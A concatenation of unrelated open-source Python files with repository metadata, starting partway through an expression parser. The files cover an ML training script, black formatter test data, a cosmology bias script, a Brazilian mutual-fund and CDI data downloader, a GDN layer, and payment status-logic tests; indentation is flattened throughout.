R_STRING = re.compile(r"('[^'\\]*(?:\\.[^'\\]*)*'|\"[^\"\\]*(?:\\.[^\"\\]*)*\")\s*", re.IGNORECASE)
R_OPERATOR_UNARY = re.compile(r'[+\-!~]\s*', re.IGNORECASE)
R_OPERATOR_BINARY = re.compile(r'(\*\*|\<{1,2}|\<=|\>{1,2}|\>=|\.\.|==|!=|\<\>|\/{1,2}|[-+*%&|^])\s*', re.IGNORECASE)
R_INTEGER = re.compile(r'(0[xh][0-9a-f]+(?:_[0-9a-f]+)*|0[oq][0-7]+(?:_[0-7]+)*|0[by][01]+(?:_[01]+)*|(?:0[dt])?[0-9]+(?:_[0-9]+)*)\s*', re.IGNORECASE)
R_PAREN_OPEN = re.compile(r'\(\s*', re.IGNORECASE)
R_PAREN_CLOSE = re.compile(r'\)\s*', re.IGNORECASE)
R_END_ALL = re.compile(r'(?:;|,|\)|\])\s*|$', re.IGNORECASE)
@parsy.generate
def parse_integer():
num = yield parsy.regex(R_INTEGER).desc('integer').optional()
if num:
num = num.strip().replace('_', '').lower()
if num.startswith('0x') or num.startswith('0h'):
return int(num[2:], 16)
elif num.startswith('0o') or num.startswith('0q'):
return int(num[2:], 8)
elif num.startswith('0b') or num.startswith('0y'):
return int(num[2:], 2)
elif num.startswith('0d') or num.startswith('0t'):
return int(num[2:], 10)
else:
return int(num, 10)
return None
@parsy.generate
def parse_expression():
yield parsy.regex(R_SPACE).optional()
result = []
while True:
c = yield parsy.regex(R_OPERATOR_UNARY).desc('unary operator').optional()
if c:
c = c.strip()
result.append(UnaryExpression(c))
continue
c = yield parse_integer
if c is not None:
result.append(ConstantExpression(c))
else:
c = yield parsy.regex(R_REFERENCE).desc('reference').optional()
if c:
c = c.strip()
result.append(ReferenceExpression(c))
else:
c = yield parsy.regex(R_STRING).desc('string').optional()
if c:
c = ast.literal_eval(c)
result.append(ConstantExpression(c))
else:
c = yield parsy.regex(R_PAREN_OPEN).desc('expression')
if c:
c = yield parse_expression
result.append(c)
yield parsy.regex(R_PAREN_CLOSE).desc('closing )')
c = yield parsy.regex(R_OPERATOR_BINARY).desc('binary operator').optional()
if c:
c = c.strip()
bin = BinaryExpression(c)
if c != '**':
reduce_expression(result, bin.level())
bin.A = result.pop()
result.append(bin)
else:
c = yield parsy.peek(parsy.regex(R_END_ALL).desc('expression'))
break
reduce_expression(result)
return validate_expression(result.pop())
def reduce_expression(ops, level=0):
while len(ops) > 1:
e = ops.pop()
t = ops[-1]
if t.level() >= level:
if isinstance(t, BinaryExpression):
t.B = e
else:
if isinstance(t, UnaryExpression):
t.A = e
else:
raise RuntimeError('Cannot reduce expression stack!')
else:
ops.append(e)
break
def validate_expression(e):
if e is None:
raise RuntimeError('Expected expression!')
if isinstance(e, BinaryExpression):
validate_expression(e.A)
validate_expression(e.B)
elif isinstance(e, UnaryExpression):
validate_expression(e.A)
return e
class BinaryExpression:
operations = {
'**': (55, lambda a, b: a ** b),
'*': (43, lambda a, b: a * b),
'/': (43, lambda a, b: a / b),
'//': (43, lambda a, b: a // b),
'%': (43, lambda a, b: a % b),
'+': (42, lambda a, b: a + b),
'-': (42, lambda a, b: a - b),
'<<': (35, lambda a, b: a << b),
'>>': (35, lambda a, b: a >> b),
'==': (20, lambda a, b: a == b and 1 or 0),
'!=': (20, lambda a, b: a != b and 1 or 0),
'<>': (20, lambda a, b: a != b and 1 or 0),
'&': (12, lambda a, b: a & b),
'^': (11, lambda a, b: a ^ b),
'|': (10, lambda a, b: a | b),
}
def __init__(self, text):
self.text = text
self.A = None
self.B = None
def __repr__(self):
return '(' + repr(self.A) + str(self.text) + repr(self.B) + ')'
def level(self):
return BinaryExpression.operations[self.text][0]
def execute(self, options, labels):
a = self.A.execute(options, labels)
b = self.B.execute(options, labels)
return BinaryExpression.operations[self.text][1](a, b)
def reduce(self, options, labels):
result = self
a = self.A.reduce(options, labels)
b = self.B.reduce(options, labels)
if a is not self.A or b is not self.B:
result = BinaryExpression(self.text)
result.A = a
result.B = b
if isinstance(a, ConstantExpression) and isinstance(b, ConstantExpression):
result = ConstantExpression(result.execute(options, labels))
return result
class UnaryExpression:
operations = {
'+': (50, lambda a: a),
'-': (50, lambda a: -a),
'!': (50, lambda a: 1 - (a and 1 or 0)),
'~': (50, lambda a: ~a),
}
def __init__(self, text):
self.text = text
self.A = None
def __repr__(self):
return str(self.text) + repr(self.A)
def level(self):
return UnaryExpression.operations[self.text][0]
def execute(self, options, labels):
a = self.A.execute(options, labels)
return UnaryExpression.operations[self.text][1](a)
def reduce(self, options, labels):
result = self
a = self.A.reduce(options, labels)
if a is not self.A:
result = UnaryExpression(self.text)
result.A = a
if isinstance(a, ConstantExpression):
result = ConstantExpression(result.execute(options, labels))
return result
class ConstantExpression:
def __init__(self, text):
self.text = text
def __repr__(self):
return 'constant(' + repr(self.text) + ')'
def level(self):
return 65
def execute(self, options, labels):
#TODO: How to encode strings?
return int(self.text)
def reduce(self, options, labels):
return self
class ReferenceExpression:
def __init__(self, text):
self.text = text
def __repr__(self):
return 'reference(' + repr(self.text) + ')'
def level(self):
return 65
def execute(self, options, labels):
return labels[self.text]
def reduce(self, options, labels):
return self
| 2.640625 | 3 |
v3/disentangled training/run.py | biboamy/instrument-disentangle | 19 | 12762495 | import datetime,os,torch
from torch.utils.data import Dataset
from loadData import *
from lib import *
from fit import *
from model import *
from skimage.measure import block_reduce
import sys
date = datetime.datetime.now()
os.environ['CUDA_VISIBLE_DEVICES'] = '6' # change
# UnetAE_preRoll
# UnetAE_preIP_preRoll -> only predict instrument at buttom
# UnetAE_preIP_prePP_prePNZ_preRoll -> with pitch as adv training predict zero
# UnetAE_preIP_prePP_prePNN_preRoll -> with pitch as adv training negative loss
# DuoAE_preIP_prePP -> no pianoroll conntected
# DuoAE_preIP_preINZ_prePP_prePNZ -> no pianoroll conntected and adv training predict zero
# DuoAE_preIP_preINN_prePP_prePNN -> no pianoroll conntected and adv training negative loss
# DuoAE_preIP_prePP_preRoll -> pianoroll conntected
# DuoAE_preIP_preINZ_prePP_prePNZ_preRoll -> pianoroll conntected and adv training predict zero
# DuoAE_preIP_preINN_prePP_prePNN_preRoll -> pianoroll conntected and adv training predict negative
def main(args):
name = args[1]
batch_size = 10
epoch = 100
lr = 0.01
out_model_fn = '../data/model/%d%d%d/%s/'%(date.year,date.month,date.day,name)
if not os.path.exists(out_model_fn):
os.makedirs(out_model_fn)
# load data
t_kwargs = {'batch_size': batch_size, 'num_workers': 2, 'pin_memory': True,'drop_last': True}
Xtr,Ytr,Ytr_p,Ytr_s = load('musescore')
# Xtr (batch_size, 1, note_bin, time_length)
# Ytr (batch_size, instrument_categories, time_length)
# Ytr_p (batch_size, note_bin, time_length)
# Ytr_s (batch_size, instrument_categories, note_bin, time_length)
Xtr_mel,Ytr_mel = load_melody('musescore')
avg, std = np.load('../../data/cqt_avg_std.npy')
trdata = [Xtr, Ytr, Ytr_p, Ytr_s, Xtr_mel, Ytr_mel]
tr_loader = torch.utils.data.DataLoader(Data2Torch(trdata), shuffle=True, **t_kwargs)
print('finishing data building...')
# build model
model = Net(name).cuda()
model.apply(model_init)
# balance data
weight = [get_weight(Ytr)]
# start training
Trer = Trainer(model, lr, epoch, out_model_fn, avg, std)
Trer.fit(tr_loader, weight, name)
print( out_model_fn)
if __name__ == "__main__":
main(sys.argv)
| 2.0625 | 2 |
tests/data/docstring_no_string_normalization.py | AppliedIntuition/black | 28 | 12762496 | class ALonelyClass:
'''
A multiline class docstring.
'''
def AnEquallyLonelyMethod(self):
'''
A multiline method docstring'''
pass
def one_function():
'''This is a docstring with a single line of text.'''
pass
def shockingly_the_quotes_are_normalized():
'''This is a multiline docstring.
This is a multiline docstring.
This is a multiline docstring.
'''
pass
def foo():
"""This is a docstring with
some lines of text here
"""
return
def baz():
'''"This" is a string with some
embedded "quotes"'''
return
def poit():
"""
Lorem ipsum dolor sit amet.
Consectetur adipiscing elit:
- sed do eiusmod tempor incididunt ut labore
- dolore magna aliqua
- enim ad minim veniam
- quis nostrud exercitation ullamco laboris nisi
- aliquip ex ea commodo consequat
"""
pass
def under_indent():
"""
These lines are indented in a way that does not
make sense.
"""
pass
def over_indent():
"""
This has a shallow indent
- But some lines are deeper
- And the closing quote is too deep
"""
pass
def single_line():
"""But with a newline after it!
"""
pass
def this():
r"""
'hey ho'
"""
def that():
""" "hey yah" """
def and_that():
"""
"hey yah" """
def and_this():
'''
"hey yah"'''
def believe_it_or_not_this_is_in_the_py_stdlib(): '''
"hey yah"'''
def shockingly_the_quotes_are_normalized_v2():
'''
Docstring Docstring Docstring
'''
pass
# output
class ALonelyClass:
'''
A multiline class docstring.
'''
def AnEquallyLonelyMethod(self):
'''
A multiline method docstring'''
pass
def one_function():
'''This is a docstring with a single line of text.'''
pass
def shockingly_the_quotes_are_normalized():
'''This is a multiline docstring.
This is a multiline docstring.
This is a multiline docstring.
'''
pass
def foo():
"""This is a docstring with
some lines of text here
"""
return
def baz():
'''"This" is a string with some
embedded "quotes"'''
return
def poit():
"""
Lorem ipsum dolor sit amet.
Consectetur adipiscing elit:
- sed do eiusmod tempor incididunt ut labore
- dolore magna aliqua
- enim ad minim veniam
- quis nostrud exercitation ullamco laboris nisi
- aliquip ex ea commodo consequat
"""
pass
def under_indent():
"""
These lines are indented in a way that does not
make sense.
"""
pass
def over_indent():
"""
This has a shallow indent
- But some lines are deeper
- And the closing quote is too deep
"""
pass
def single_line():
"""But with a newline after it!"""
pass
def this():
r"""
'hey ho'
"""
def that():
""" "hey yah" """
def and_that():
"""
"hey yah" """
def and_this():
'''
"hey yah"'''
def believe_it_or_not_this_is_in_the_py_stdlib():
'''
"hey yah"'''
def shockingly_the_quotes_are_normalized_v2():
'''
Docstring Docstring Docstring
'''
pass
| 3.53125 | 4 |
Applications/ue4/4.20.2/package.py | cashmerepipeline/CashmereRez | 0 | 12762497 | # -*- coding: utf-8 -*-
name = 'ue4'
version = '4.20.2'
author = ['ue4']
requires = ["python-2.7.11"]
variants = []
def commands():
import os
applications_path = os.environ["APPLICATIONS_PATH"]
python_path = os.path.join(applications_path, "python", "2.7.11").replace("/", os.sep)
ue4_path = os.path.join(applications_path, "ue4", "%s"%version).replace("/", os.sep)
env.UE_PYTHON_DIR.set(python_path)
env.PATH.append(os.path.join(ue4_path, "Engine", "Binaries", "Win64").replace("/", os.sep))
| 1.921875 | 2 |
code/oldtmpcodes/get_bias.py | modichirag/21cmhod | 0 | 12762498 | import numpy as np
from pmesh.pm import ParticleMesh
from nbodykit.lab import BigFileCatalog, MultipleSpeciesCatalog,\
BigFileMesh, FFTPower
from nbodykit import setup_logging
from mpi4py import MPI
import HImodels
# enable logging, we have some clue what's going on.
setup_logging('info')
#
#Global, fixed things
scratchyf = '/global/cscratch1/sd/yfeng1/m3127/'
scratchcm = '/global/cscratch1/sd/chmodi/m3127/H1mass/'
project = '/project/projectdirs/m3127/H1mass/'
cosmodef = {'omegam':0.309167, 'h':0.677, 'omegab':0.048}
alist = [0.1429,0.1538,0.1667,0.1818,0.2000,0.2222,0.2500,0.2857,0.3333]
#Parameters, box size, number of mesh cells, simulation, ...
bs, nc, ncsim, sim, prefix = 256, 512, 2560, 'highres/%d-9100-fixed'%2560, 'highres'
#bs,nc,ncsim, sim, prefic = 1024, 1024, 10240, 'highres/%d-9100-fixed'%ncsim, 'highres'
# It's useful to have my rank for printing...
pm = ParticleMesh(BoxSize=bs, Nmesh=[nc, nc, nc])
rank = pm.comm.rank
comm = pm.comm
#Which model to use
HImodel = HImodels.ModelA
ofolder = '../data/outputs/'
def calc_bias(aa,h1mesh,suff):
'''Compute the bias(es) for the HI'''
if rank==0:
print("Processing a={:.4f}...".format(aa))
print('Reading DM mesh...')
if ncsim == 10240:
dm = BigFileMesh(scratchyf+sim+'/fastpm_%0.4f/'%aa+\
'/1-mesh/N%04d'%nc,'').paint()
else:
dm = BigFileMesh(project+sim+'/fastpm_%0.4f/'%aa+\
'/dmesh_N%04d/1/'%nc,'').paint()
dm /= dm.cmean()
if rank==0: print('Computing DM P(k)...')
pkmm = FFTPower(dm,mode='1d').power
k,pkmm= pkmm['k'],pkmm['power'] # Ignore shotnoise.
if rank==0: print('Done.')
#
pkh1h1 = FFTPower(h1mesh,mode='1d').power
pkh1h1 = pkh1h1['power']-pkh1h1.attrs['shotnoise']
pkh1mm = FFTPower(h1mesh,second=dm,mode='1d').power['power']
if rank==0: print('Done.')
# Compute the biases.
b1x = np.abs(pkh1mm/(pkmm+1e-10))
b1a = np.abs(pkh1h1/(pkmm+1e-10))**0.5
if rank==0: print("Finishing processing a={:.4f}.".format(aa))
return(k,b1x,b1a,np.abs(pkmm))
#
if __name__=="__main__":
#satsuff='-m1_5p0min-alpha_0p8-16node'
suff='-m1_00p3mh-alpha-0p8-subvol'
outfolder = ofolder + suff[1:] + "/modelA/"
try: os.makedirs(outfolder)
except : pass
if rank==0:
print('Starting')
for aa in alist:
if rank == 0: print('\n ############## Redshift = %0.2f ############## \n'%(1/aa-1))
halocat = BigFileCatalog(scratchyf + sim+ '/fastpm_%0.4f//'%aa, dataset='LL-0.200')
mp = halocat.attrs['MassTable'][1]*1e10##
halocat['Mass'] = halocat['Length'].compute() * mp
cencat = BigFileCatalog(scratchcm + sim+'/fastpm_%0.4f/cencat'%aa+suff)
satcat = BigFileCatalog(scratchcm + sim+'/fastpm_%0.4f/satcat'%aa+suff)
rsdfac = read_conversions(scratchyf + sim+'/fastpm_%0.4f/'%aa)
#
HImodelz = HImodel(aa)
los = [0,0,1]
halocat['HImass'], cencat['HImass'], satcat['HImass'] = HImodelz.assignHI(halocat, cencat, satcat)
halocat['RSDpos'], cencat['RSDpos'], satcat['RSDpos'] = HImodelz.assignrsd(rsdfac, halocat, cencat, satcat, los=los)
h1mesh = HImodelz.createmesh(bs, nc, halocat, cencat, satcat, mode='galaxies', position='RSDpos', weight='HImass')
kk,b1x,b1a,pkmm = calc_bias(aa,h1mesh,suff)
#
if rank==0:
fout = open(outfolder + "HI_bias_{:6.4f}.txt".format(aa),"w")
fout.write("# Mcut={:12.4e}Msun/h.\n".format(mcut))
fout.write("# {:>8s} {:>10s} {:>10s} {:>15s}\n".\
format("k","b1_x","b1_a","Pkmm"))
for i in range(1,kk.size):
fout.write("{:10.5f} {:10.5f} {:10.5f} {:15.5e}\n".\
format(kk[i],b1x[i],b1a[i],pkmm[i]))
fout.close()
#
| 1.742188 | 2 |
update_db.py | dss-Diego/br_mfunds | 2 | 12762499 | # -*- coding: utf-8 -*-
"""
Created on Wed Sep 2 19:15:26 2020
@author: Diego
"""
import pandas as pd
import sqlite3
import wget
import os
from urllib.request import urlopen
from bs4 import BeautifulSoup
import urllib.request
import datetime
import zipfile
import io
import requests
if not os.path.exists('data'):
os.makedirs('data')
if not os.path.exists(os.path.join('data', 'temp')):
os.makedirs(os.path.join('data', 'temp'))
conn = sqlite3.connect(os.path.join('data', 'fundos.db'))
db = conn.cursor()
# %% functions
def create_tables():
"""
Creates all tables in the database.
Returns
-------
None.
"""
db.execute("""CREATE TABLE IF NOT EXISTS files
(file_name TEXT,
last_modified DATE)""")
db.execute("""CREATE TABLE IF NOT EXISTS quotas
(cnpj TEXT,
date DATE,
quota REAL)""")
db.execute("CREATE INDEX idx_quotas_cnpj ON quotas(cnpj);")
db.execute("""CREATE TABLE IF NOT EXISTS inf_cadastral
(cnpj TEXT,
denom_social TEXT,
classe text,
rentab_fundo TEXT,
taxa_perfm INTEGER,
taxa_adm REAL)""")
db.execute("""CREATE TABLE IF NOT EXISTS cdi
(date DATE,
cdi REAL,
d_factor REAL)""")
def update_register():
"""
Updates the mutual funds register.
Returns
-------
None.
"""
url = 'http://dados.cvm.gov.br/dados/FI/CAD/DADOS/'
files = {}
i = 0
html = urlopen(url)
soup = BeautifulSoup(html, 'lxml')
table = soup.find('table')
tr = table.find_all('tr')
for t in tr:
if t.text[0:17] == 'inf_cadastral_fi_':
file_name = t.text[0:29]
last_modified = pd.to_datetime(t.text[29:45])
files[i] = {'file_name': file_name, 'url_date': last_modified}
i += 1
available_files = pd.DataFrame.from_dict(files, orient='index')
available_files['url_date'] = pd.to_datetime(available_files['url_date'])
last_file = available_files['file_name'][available_files['url_date'] == max(available_files['url_date'])].values[0]
file_url = f"http://dados.cvm.gov.br/dados/FI/CAD/DADOS/{last_file}"
response = requests.get(file_url)
df = pd.read_csv(io.BytesIO(response.content), sep=';', header=0, encoding='latin-1')
df.columns = df.columns.str.lower()
df = df.rename(columns={'cnpj_fundo': 'cnpj'})
# drop inactive
df = df[df['sit'] == 'EM FUNCIONAMENTO NORMAL']
# drop closed
df = df[df['condom'] == 'Aberto']
# drop no equity
df = df[df['vl_patrim_liq'] != 0]
df = df.drop_duplicates(subset=['cnpj'], keep='last')
df = df[['cnpj', 'denom_social', 'classe', 'rentab_fundo', 'taxa_perfm', 'taxa_adm']]
df[['taxa_perfm', 'taxa_adm']] = df[['taxa_perfm', 'taxa_adm']].fillna(value=0)
db.execute("DELETE FROM inf_cadastral")
df.to_sql('inf_cadastral', conn, if_exists='append', index=False)
conn.commit()
return
def update_quotes():
"""
Updates the mutual funds quotes.
Returns
-------
None.
"""
db_files = pd.read_sql("SELECT * FROM files", conn)
urls = ['http://dados.cvm.gov.br/dados/FI/DOC/INF_DIARIO/DADOS/HIST/',
'http://dados.cvm.gov.br/dados/FI/DOC/INF_DIARIO/DADOS/']
files = {}
i = 0
for url in urls:
html = urlopen(url)
soup = BeautifulSoup(html, 'lxml')
table = soup.find('table')
tr = table.find_all('tr')
for t in tr:
if t.text[0:14] == 'inf_diario_fi_':
if url == 'http://dados.cvm.gov.br/dados/FI/DOC/INF_DIARIO/DADOS/':
file_name = t.text[0:24]
last_modified = pd.to_datetime(t.text[24:40]).date()
else:
file_name = t.text[0:22]
last_modified = pd.to_datetime(t.text[22:38]).date()
files[i] = {'file_name': file_name, 'url_date': last_modified}
i += 1
available_files = pd.DataFrame.from_dict(files, orient='index')
new_files = available_files.merge(db_files, how='left', right_on='file_name', left_on='file_name')
new_files = new_files.fillna(pd.to_datetime('1900-01-01'))
new_files = new_files[new_files['url_date'] > pd.to_datetime(new_files['last_modified'])]
for idx, file in new_files.iterrows():
if len(file['file_name']) == 22:
url = 'http://dados.cvm.gov.br/dados/FI/DOC/INF_DIARIO/DADOS/HIST/'
zip_or_csv = 'zip'
else:
url = 'http://dados.cvm.gov.br/dados/FI/DOC/INF_DIARIO/DADOS/'
zip_or_csv = 'csv'
file_url = url + file['file_name']
file_data = requests.get(file_url).content
db.execute(f"""DELETE FROM files
WHERE file_name = '{file['file_name']}'""")
load_file(file_data, zip_or_csv=zip_or_csv)
db.execute(f"""INSERT INTO files
VALUES ('{file['file_name']}', '{file['url_date']}')""")
print(f"{file['file_name']} downloaded successfully.")
conn.commit()
return
def load_file(file_data, zip_or_csv):
"""
Loads the file with the new quotes.
Parameters
----------
file_name : string
Returns
-------
None.
"""
active = pd.read_sql("SELECT cnpj FROM inf_cadastral", conn)['cnpj']
if zip_or_csv == 'zip':
zip_file = zipfile.ZipFile(io.BytesIO(file_data))
# dict with all csv files
files_dict = {}
for i in range(len(zip_file.namelist())):
files_dict[zip_file.namelist()[i]] = zip_file.read(zip_file.namelist()[i])
else:
files_dict = {'any_name': file_data }
for key in files_dict.keys():
df = pd.read_csv(io.BytesIO(files_dict[key]), sep=';', header=0, encoding='latin-1')
df.columns = df.columns.str.lower()
df = df.rename(columns={'cnpj_fundo': 'cnpj', 'dt_comptc': 'date', 'vl_quota': 'quota'})
df = df[df['cnpj'].isin(list(active))]
df = df[['cnpj', 'date', 'quota']]
year = df['date'].str[:4].unique()[0]
month = df['date'].str[5:7].unique()[0]
db.execute(f"""DELETE FROM quotas
WHERE SUBSTR(date, 1, 4) = '{year}' AND
SUBSTR(date, 6, 2) = '{month}'""")
df.to_sql('quotas', conn, if_exists='append', index=False)
conn.commit()
return
def update_cdi():
"""
Updates the CDI (Brazilian reference rate).
Returns
-------
None.
"""
# Files in the ftp:
url = 'ftp://ftp.cetip.com.br/MediaCDI/'
req = urllib.request.Request(url)
r = urllib.request.urlopen(req)
text = str(r.read())
text = text.replace('\\n', ' ')
text = text.replace('\\r', '')
text = text.replace("b'", "")
text = text.replace("'", "")
text = text.split()
available_files = []
for file_name in text:
if file_name[-4:] == '.txt':
available_files.append(file_name)
# Files in the database:
db_files = pd.read_sql("SELECT * FROM files", conn)
db_files = db_files['file_name'].to_list()
# check if the file is new, process and update files table
for file in available_files:
if file not in db_files:
for fl in os.listdir(os.path.join('data', 'temp')):
os.remove(os.path.join('data', 'temp', fl))
file_url = f"ftp://ftp.cetip.com.br/MediaCDI/{file}"
wget.download(file_url, os.path.join('data', 'temp'))
with open(os.path.join('data', 'temp', file), 'r') as content:
cdi = int(content.readline()) / 100
d_factor = ((cdi / 100) + 1) ** (1 / 252)
date = datetime.datetime.strptime(file[:8], '%Y%m%d')
db.execute(f"""INSERT INTO cdi
VALUES ('{date}', {cdi}, {d_factor})""")
# These files are not updated by the provider (cetip.com.br).
# Because of that, the last_modified is not important, and set to 1900-01-01
db.execute(f"""INSERT INTO files
VALUES ('{file}', '1900-01-01')""")
conn.commit()
print("CDI file " + file + " downloaded successfully.")
return
def update_pipeline():
# create database tables
query = "SELECT name FROM sqlite_master WHERE type='table' AND name='quotas';"
if db.execute(query).fetchone() == None:
create_tables()
update_register()
update_quotes()
update_cdi()
return
| 2.84375 | 3 |
libuvs/uvs_errors.py | kouritron/uvs | 0 | 12762500 | <gh_stars>0
## UVSError handling guidelines:
# 1- don't use OOP exceptions, NEVER NEVER NEVER use inheritance in exceptions
# i dont like exception X that inherits from Y and 2mrw is a G then suddenly catches an F blah blah
# doing the above makes it harder not easier to figure out what the hell happened.
# just use one exception class. return a descriptive msg as to what happened. and if more specifity is needed
# associate an error code with that exception and enumerate the errors
# (i.e. 1 means permission denied, 2 means mac failed ..... ) this is so far not needed.
# if it was needed we code add something like uvs_error_no field to this class and enumerate the
# the different error codes in this module.
# (python shamefully has no constants but there is trick to be done with properties, and raise Error on set
# that pretty much gives us the same thing as language enforced constants, google it)
#
# 2- exceptions are not return values, dont ever use exceptions to communicate results from a sub-routine.
# exceptions are meant to indicate a catastrophic situation that required an immediate termination
# to whatever was happening. for example if a key was not found do NOT raise an exception, return None
# an exception must terminate something. sometimes it should terminate the process. sometimes
# it terminates a thread, sometimes it should terminate a web request. its not a return value.
# it should be used like golang's panic call.
#
#
class UVSError(Exception):
pass
| 3.171875 | 3 |
compressai/layers/gdn.py | Conzel/CompressAI | 515 | 12762501 | <reponame>Conzel/CompressAI<filename>compressai/layers/gdn.py
# Copyright (c) 2021-2022, InterDigital Communications, Inc
# All rights reserved.
# Redistribution and use in source and binary forms, with or without
# modification, are permitted (subject to the limitations in the disclaimer
# below) provided that the following conditions are met:
# * Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# * Neither the name of InterDigital Communications, Inc nor the names of its
# contributors may be used to endorse or promote products derived from this
# software without specific prior written permission.
# NO EXPRESS OR IMPLIED LICENSES TO ANY PARTY'S PATENT RIGHTS ARE GRANTED BY
# THIS LICENSE. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND
# CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT
# NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A
# PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;
# OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
# OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF
# ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch import Tensor
from compressai.ops.parametrizers import NonNegativeParametrizer
__all__ = ["GDN", "GDN1"]
class GDN(nn.Module):
r"""Generalized Divisive Normalization layer.
Introduced in `"Density Modeling of Images Using a Generalized Normalization
Transformation" <https://arxiv.org/abs/1511.06281>`_,
by <NAME>, <NAME>, and <NAME>, (2016).
.. math::
y[i] = \frac{x[i]}{\sqrt{\beta[i] + \sum_j(\gamma[j, i] * x[j]^2)}}
"""
def __init__(
self,
in_channels: int,
inverse: bool = False,
beta_min: float = 1e-6,
gamma_init: float = 0.1,
):
super().__init__()
beta_min = float(beta_min)
gamma_init = float(gamma_init)
self.inverse = bool(inverse)
self.beta_reparam = NonNegativeParametrizer(minimum=beta_min)
beta = torch.ones(in_channels)
beta = self.beta_reparam.init(beta)
self.beta = nn.Parameter(beta)
self.gamma_reparam = NonNegativeParametrizer()
gamma = gamma_init * torch.eye(in_channels)
gamma = self.gamma_reparam.init(gamma)
self.gamma = nn.Parameter(gamma)
def forward(self, x: Tensor) -> Tensor:
_, C, _, _ = x.size()
beta = self.beta_reparam(self.beta)
gamma = self.gamma_reparam(self.gamma)
gamma = gamma.reshape(C, C, 1, 1)
norm = F.conv2d(x ** 2, gamma, beta)
if self.inverse:
norm = torch.sqrt(norm)
else:
norm = torch.rsqrt(norm)
out = x * norm
return out
class GDN1(GDN):
r"""Simplified GDN layer.
Introduced in `"Computationally Efficient Neural Image Compression"
<http://arxiv.org/abs/1912.08771>`_, by <NAME>, <NAME>, <NAME>, and <NAME>, (2019).
.. math::
y[i] = \frac{x[i]}{\beta[i] + \sum_j(\gamma[j, i] * |x[j]|}
"""
def forward(self, x: Tensor) -> Tensor:
_, C, _, _ = x.size()
beta = self.beta_reparam(self.beta)
gamma = self.gamma_reparam(self.gamma)
gamma = gamma.reshape(C, C, 1, 1)
norm = F.conv2d(torch.abs(x), gamma, beta)
if not self.inverse:
norm = 1.0 / norm
out = x * norm
return out
| 1.125 | 1 |
json_dbindex/models.py | peopledoc/django-json-dbindex | 3 | 12762502 | <reponame>peopledoc/django-json-dbindex<gh_stars>1-10
# No models for this apps
| 1.0625 | 1 |
tests/sort_test.py | spencerpomme/pyalgolib | 0 | 12762503 | <reponame>spencerpomme/pyalgolib<filename>tests/sort_test.py
from algorithms.sort import Comparison
from algorithms.sort import NonComparison
if __name__ == "__main__":
Comparison.bubble_sort()
NonComparison.radix_sort()
| 1.554688 | 2 |
src/offchainapi/tests/test_status_logic.py | LuZhang-Lou/off-chain-reference | 0 | 12762504 | # Copyright (c) The Libra Core Contributors
# SPDX-License-Identifier: Apache-2.0
from ..protocol import VASPPairChannel
from ..status_logic import Status, KYCResult, State, InvalidStateException
from ..payment_command import PaymentCommand, PaymentLogicError
from ..business import BusinessForceAbort, BusinessValidationFailure
from os import urandom
from ..payment import PaymentObject, StatusObject, PaymentActor, PaymentAction
from ..libra_address import LibraAddress
from ..asyncnet import Aionet
from ..storage import StorableFactory
from ..payment_logic import PaymentProcessor
from ..utils import JSONFlag
from ..errors import OffChainErrorCode
from .basic_business_context import TestBusinessContext
from unittest.mock import MagicMock
from mock import AsyncMock
import pytest
import copy
@pytest.fixture
def payment():
sender_addr = LibraAddress.from_bytes("lbr", b'B'*16, b'b'*8)
sender = PaymentActor(sender_addr.as_str(), StatusObject(Status.none))
receiver_addr = LibraAddress.from_bytes("lbr", b'A'*16, b'a'*8)
receiver = PaymentActor(receiver_addr.as_str(), StatusObject(Status.none))
action = PaymentAction(5, 'TIK', 'charge', 7784993)
ref_id = f'{LibraAddress.from_encoded_str(sender_addr.get_onchain_encoded_str())}_{urandom(16).hex()}'
return PaymentObject(
sender, receiver, ref_id, None,
'Human readable payment information.', action
)
def test_SINIT(payment):
payment.sender.change_status(StatusObject(Status.needs_kyc_data))
assert State.from_payment_object(payment) == State.SINIT
payment2 = payment.new_version()
payment2.sender.add_additional_kyc_data("additional_kyc")
with pytest.raises(InvalidStateException):
State.from_payment_object(payment2)
payment3 = payment.new_version()
payment3.receiver.add_additional_kyc_data("additional_kyc")
with pytest.raises(InvalidStateException):
State.from_payment_object(payment3)
def test_RSEND(payment):
payment.sender.change_status(StatusObject(Status.needs_kyc_data))
payment.receiver.change_status(StatusObject(Status.ready_for_settlement))
assert State.from_payment_object(payment) == State.RSEND
payment2 = payment.new_version()
payment2.sender.add_additional_kyc_data("additional_kyc")
assert State.from_payment_object(payment2) == State.RSEND
payment3 = payment.new_version()
payment3.receiver.add_additional_kyc_data("additional_kyc")
with pytest.raises(InvalidStateException):
State.from_payment_object(payment3)
payment4 = payment2.new_version()
payment4.receiver.add_additional_kyc_data("additional_kyc")
with pytest.raises(InvalidStateException):
State.from_payment_object(payment4)
def test_RABORT(payment):
payment.sender.change_status(StatusObject(Status.needs_kyc_data))
payment.receiver.change_status(StatusObject(Status.abort, "", ""))
assert State.from_payment_object(payment) == State.RABORT
payment2 = payment.new_version()
payment2.sender.add_additional_kyc_data("additional_kyc")
assert State.from_payment_object(payment2) == State.RABORT
payment3 = payment.new_version()
payment3.receiver.add_additional_kyc_data("additional_kyc")
with pytest.raises(InvalidStateException):
State.from_payment_object(payment3)
def test_SABORT(payment):
payment.sender.change_status(StatusObject(Status.abort, "", ""))
payment.receiver.change_status(StatusObject(Status.ready_for_settlement))
